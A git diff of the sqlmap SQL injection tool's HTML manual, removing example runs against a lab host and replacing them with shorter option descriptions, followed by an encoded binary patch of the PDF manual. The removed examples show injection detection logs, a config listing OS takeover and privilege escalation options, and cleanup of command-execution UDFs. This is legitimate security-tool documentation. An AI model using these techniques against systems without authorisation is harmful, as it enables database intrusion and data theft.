-[hh:mm:22] [INFO] testing if Cookie parameter 'PHPSESSID' is dynamic
-[hh:mm:24] [INFO] confirming that Cookie parameter 'PHPSESSID' is dynamic
-[hh:mm:27] [INFO] Cookie parameter 'PHPSESSID' is dynamic
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+counts the number of retrieved output characters.</P>
 
 
 <H3>Update sqlmap</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-update</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-update</CODE></P>
 
-<P>Using this option you can update the program to the latest version
-directly from the Subversion repository along with the latest
-Microsoft SQL Server XML versions file from Chip Andrews'
-<A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A>.</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py --update
+<P>Using this option you can update the tool to the latest development
+version directly from the subversion repository. You obviously need
+Internet access.</P>
 
-[...]
-[hh:mm:27] [INFO] updating sqlmap to latest development version from the subversion repository
-[hh:mm:28] [INFO] updated to the latest revision XXXX
-[hh:mm:29] [INFO] updating Microsoft SQL Server XML versions file
-[hh:mm:33] [INFO] no new Microsoft SQL Server versions since the last update
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>The Debian and Red Hat installation packages (deb and rpm) as well as the
-Windows binary package (exe) can not be used to update sqlmap. You need
-a source package (gzip, bzip2 or zip) to use this feature.</P>
+<P>If, for any reason, this operation fails, try with a manual <CODE>svn
+update</CODE> from your sqlmap working copy. It will perform the exact same
+operation of switch <CODE>-</CODE><CODE>-update</CODE>.
+If you are running sqlmap on Windows, you can use the TartoiseSVN client
+by right-clicking in Windows Explorer into your local sqlmap working copy
+and <CODE>Update</CODE>.</P>
 
 
 <H3>Save options in a configuration INI file</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-save</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-save</CODE></P>
 
 <P>It is possible to save the command line options to a configuration INI
-file.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1" -b \
-  -v 1 --save
-
-[hh:mm:33] [INFO] saved command line options on '/home/inquis/sqlmap/sqlmap-SAUbs.conf' 
-configuration file
-[hh:mm:33] [INFO] testing connection to the target url
-[hh:mm:33] [INFO] testing if the url is stable, wait a few seconds
-[...]
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, sqlmap saved the command line options to a configuration
-INI file, <CODE>sqlmap-SAUbs.conf</CODE>.</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ cat sqlmap-SAUbs.conf
-[Target]
-url = http://172.16.213.131/sqlmap/pgsql/get_int.php?id=1
-googledork = 
-configfile = 
-list = 
-requestfile = 
-
-[Windows]
-regread = False
-regval = 
-regdata = 
-regadd = False
-regdel = False
-regtype = 
-regkey = 
-
-[User-defined function]
-shlib = 
-udfinject = False
-
-[Request]
-cookieurlencode = False
-ignoreproxy = False
-threads = 1
-acert = 
-retries = 3
-useragentsfile = 
-atype = 
-agent = 
-delay = 0
-headers = 
-cookie = 
-proxy = 
-timeout = 30
-scope = 
-acred = 
-referer = 
-dropsetcookie = False
-data = 
-method = GET
-
-[Miscellaneous]
-updateall = False
-sessionfile = 
-eta = False
-batch = False
-flushsession = False
-cleanup = False
-googlepage = 0
-verbose = 1
-
-[Enumeration]
-limitstop = 0
-getpasswordhashes = False
-excludesysdbs = False
-getcurrentdb = False
-getcurrentuser = False
-limitstart = 0
-query = 
-getusers = False
-isdba = False
-gettables = False
-dumptable = False
-getdbs = False
-db = 
-sqlshell = False
-tbl = 
-firstchar = 0
-getcolumns = False
-getbanner = True
-dumpall = False
-getprivileges = False
-lastchar = 0
-col = 
-user = 
-
-[File system]
-dfile = 
-wfile = 
-rfile = 
-
-[Takeover]
-msfpath = 
-osshell = False
-ossmb = False
-privesc = False
-ospwn = False
-tmppath = 
-oscmd = 
-osbof = False
-
-[Fingerprint]
-extensivefp = False
-
-[Injection]
-dbms = 
-string = 
-postfix = 
-regexp = 
-prefix = 
-testparameter = 
-estring = 
-eregexp = 
-os = 
-
-[Techniques]
-utech = 
-unionuse = False
-timetest = False
-uniontest = False
-stackedtest = False
-timesec = 5
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>The file is a valid sqlmap configuration INI file.
-You can edit the configuration options as you wish and pass it to sqlmap
-with the <CODE>-c</CODE> option as explained above in section 5.2.5:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -c sqlmap-SAUbs.conf
-
-[...]
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+file.
+The generated file can then be edited and passed to sqlmap with the
+<CODE>-c</CODE> option as explained above.</P>
 
 
 <H3>Act in non-interactive mode</H3>
 
-<P>Option: <CODE>-</CODE><CODE>-batch</CODE></P>
+<P>Switch: <CODE>-</CODE><CODE>-batch</CODE></P>
 
 <P>If you want sqlmap to run as a batch tool, without any user's interaction 
-when sqlmap requires it, you can force it by using <CODE>-</CODE><CODE>-batch</CODE>
-option, and leave sqlmap to go for a default behaviour.</P>
-
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int_str.php?id=1&amp;name=luther" \
-  --batch -v 1
-
-[...]
-[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] GET parameter 'id' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'id'
-[hh:mm:22] [INFO] confirming unescaped numeric injection on GET parameter 'id'
-[hh:mm:22] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
-[hh:mm:22] [INFO] testing if GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] confirming that GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] GET parameter 'name' is dynamic
-[hh:mm:22] [INFO] testing sql injection on GET parameter 'name' with 0 parenthesis
-[hh:mm:22] [INFO] testing unescaped numeric injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is not unescaped numeric injectable
-[hh:mm:22] [INFO] testing single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] confirming single quoted string injection on GET parameter 'name'
-[hh:mm:22] [INFO] GET parameter 'name' is single quoted string injectable with 0 parenthesis
-[hh:mm:22] [INFO] there were multiple injection points, please select the one to use to go
-ahead:
-[0] place: GET, parameter: id, type: numeric (default)
-[1] place: GET, parameter: name, type: stringsingle
-[q] Quit
-Choice: 0
-[hh:mm:22] [DEBUG] used the default behaviour, running in batch mode
-[...]
-back-end DBMS:  MySQL >= 5.0.0
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see, sqlmap by default chose the injection payload to the first
-vulnerable parameter.</P>
+when sqlmap requires it, you can force that by using
+<CODE>-</CODE><CODE>-batch</CODE> switch. This will leave sqlmap to go with a
+default behaviour whenever user's input would be required.</P>
 
 
-<H3>Cleanup the DBMS by sqlmap specific UDF(s) and table(s)</H3>
+<H2><A NAME="ss5.16">5.16</A> <A HREF="#toc5.16">Miscellaneous</A>
+</H2>
 
-<P>Option: <CODE>-</CODE><CODE>-cleanup</CODE></P>
+<H3>TODO</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-beep</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>TODO</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-check-payload</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Cleanup the DBMS from sqlmap specific UDF(s) and table(s)</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-cleanup</CODE></P>
 
 <P>It is recommended to clean up the back-end database management system from
 sqlmap temporary table(s) and created user-defined function(s) when you
-are done with owning the underlying operating system or file system.</P>
-
-<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/iis/get_int.aspx?id=1" \
-  -v 2 --cleanup
-
-[...]
-[hh:mm:18] [INFO] cleaning up the database management system
-[hh:mm:18] [DEBUG] removing support tables
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:18] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] 
-[hh:mm:20] [DEBUG] removing sys_exec UDF
-[hh:mm:20] [DEBUG] query: DROP FUNCTION sys_exec(text)
-do you want to remove sys_eval UDF? [Y/n] 
-[hh:mm:21] [DEBUG] removing sys_eval UDF
-[hh:mm:21] [DEBUG] query: DROP FUNCTION sys_eval(text)
-[hh:mm:21] [INFO] database management system cleanup finished
-[hh:mm:21] [WARNING] remember that UDF shared library files saved on the file system can 
-only be deleted manually
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
+are done taking over the underlying operating system or file system.
+Switch <CODE>-</CODE><CODE>-cleanup</CODE> will attempt to clean up the DBMS and
+the file system wherever possible.</P>
 
 
-<H2><A NAME="s6">6.</A> <A HREF="#toc6">Disclaimer</A></H2>
+<H3>TODO</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-forms</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>Use Google dork results from specified page number</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-gpage</CODE></P>
+
+<P>Default sqlmap behavior with option <CODE>-g</CODE> is to do a Google
+search and use the first 100 resulting URLs for further SQL injection
+testing. However, in combination with this option you can specify with
+this switch, <CODE>-</CODE><CODE>-gpage</CODE>, some page other than the first one
+to retrieve target URLs from.</P>
+
+
+<H3>TODO</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-parse-errors</CODE></P>
+
+<P>TODO</P>
+
+
+<H3>TODO</H3>
+
+<P>Switch: <CODE>-</CODE><CODE>-replicate</CODE></P>
+
+<P>TODO</P>
+
+
+<H2><A NAME="s6">6.</A> <A HREF="#toc6">License and copyright</A></H2>
+
+<P>sqlmap is released under the terms of the
+<A HREF="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html">General Public License v2</A>.
+sqlmap is copyrighted by its 
+<A HREF="http://sqlmap.sourceforge.net/#developers">developers</A>.</P>
+
+
+<H2><A NAME="s7">7.</A> <A HREF="#toc7">Disclaimer</A></H2>
 
 <P>sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
@@ -6242,7 +2763,7 @@ that such action might get you in trouble with a lot of law enforcement
 agencies.</P>
 
 
-<H2><A NAME="s7">7.</A> <A HREF="#toc7">Authors</A></H2>
+<H2><A NAME="s8">8.</A> <A HREF="#toc8">Authors</A></H2>
 
 <P>
 <A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A> (inquis) - Lead developer.
diff --git a/doc/README.pdf b/doc/README.pdf
index 481b0ee6fffeda41b9c8e5f28e2d79c878ef6d25..c5eecbed3c71cc280c2d91c9a8ec7296fe0d9213 100644
GIT binary patch
delta 187208
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
